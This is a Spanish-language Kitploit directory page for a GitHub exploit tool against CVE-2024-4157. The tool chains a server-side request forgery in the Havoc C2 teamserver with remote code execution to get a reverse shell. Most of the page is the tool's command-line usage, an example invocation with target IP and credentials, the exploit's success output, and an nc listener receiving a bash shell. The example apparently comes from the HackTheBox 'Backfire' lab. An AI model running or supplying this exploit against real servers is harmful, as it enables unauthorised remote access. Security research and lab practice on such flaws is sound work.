Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-4157-SSRF-RCE-Reverse-Shell — Encadenando SSRF de Havoc C2 con RCE para obtener una reverse shell en el servidor de Havoc C2. | Kitploit
Herramientas/GitHubGitHub/ch4os1/cve-2024-4157-ssrf-rce-reverse-shell
ExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingDesarrollo de Payloads
GitHubch4os1/cve-2024-4157-ssrf-rce-reverse-shell

CVE-2024-4157-SSRF-RCE-Reverse-Shell

Encadenando SSRF de Havoc C2 con RCE para obtener una reverse shell en el servidor de Havoc C2.

Ver Repositorio
36hace 11 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-4157: Obteniendo Reverse Shell en Havoc C2 - Encadenando SSRF con RCE

Obtén reverse-shell con IP y puerto local, encadenando CVE-2024-4157 POC con havoc_auth_rce

Uso

  • Información básica
root@kitploit:~
$ python3 exploit.py
usage: exploit.py [-h] [-t TARGET] [-i IP] [-p PORT] [-A USER_AGENT] [-H HOSTNAME] [-u USERNAME] [-d DOMAIN_NAME] [-n PROCESS_NAME] [-ip INTERNAL_IP] [-U ADMIN_USERNAME] [-P
                  PASSWORD] [-l LOCAL_IP] [-lp LOCAL_PORT]
## -t: IP del objetivo donde se ejecuta el servidor C2
## -i: dirección IP interna con la que queremos que interactúe el servidor C2 (SSRF)
## -p: puerto interno
## -U: nombre de usuario del servidor C2
## -P: contraseña del servidor C2
## -l: dirección local para la reverse shell (RCE)
## -lp: puerto local para la reverse shell
  • Ejemplo
root@kitploit:~
$ python3 exploit.py -t https://10.129.150.254 -i 127.0.0.1 -p 40056 -U ilya -P 'CobaltStr1keSuckz!' -l 10.10.14.54 -lp 4444
[***] Trying to register agent...
[***] Success!
[***] Trying to open socket on the teamserver...
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to poll teamserver for socket output...
[***] Read socket output successfully!
  • Reverse shell en nuestro listener nc
root@kitploit:~
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.54] from (UNKNOWN) [10.129.150.254] 53352
bash: cannot set terminal process group (2933): Inappropriate ioctl for device
bash: no job control in this shell
ilya@backfire:~/Havoc/payloads/Demon$ 

Créditos

  • Crédito a @chebuya por el SSRF, blog detallado sobre la vulnerabilidad
  • Crédito a @Laurence Tennant por el RCE, información detallada en el blog
  • Crédito a 0xdf por el increíble writeup sobre HTB Backfire

Aviso legal

  • Esta herramienta es solo para fines educativos y de investigación
Descargar herramienta